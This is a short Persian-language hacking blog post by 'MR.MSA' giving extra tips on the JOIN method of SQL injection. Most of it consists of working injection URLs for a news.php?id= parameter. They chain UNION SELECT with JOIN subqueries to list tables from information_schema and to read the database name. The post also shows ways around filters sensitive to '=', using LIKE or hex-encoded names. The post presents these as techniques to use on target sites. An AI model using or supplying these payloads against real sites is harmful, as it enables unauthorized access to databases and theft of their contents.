نکته مهم در متد join

[MR.MSA 2,180]

با سلام همانطور که در  آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . 

 

در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد :

union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+

پس شما باید از این دستور استفاده کنید : 

site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23

به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . 

------------------------------

برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید :

site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23

------------------------------

امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید .

هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید .

************ MR.MSA ************

<آموزش متد polygon در sql injection >

< آموزش متد join در sql injection >

<دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس>

<دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس>

<دانلود نسخه های ۱ تا ۲ کالی لینوکس >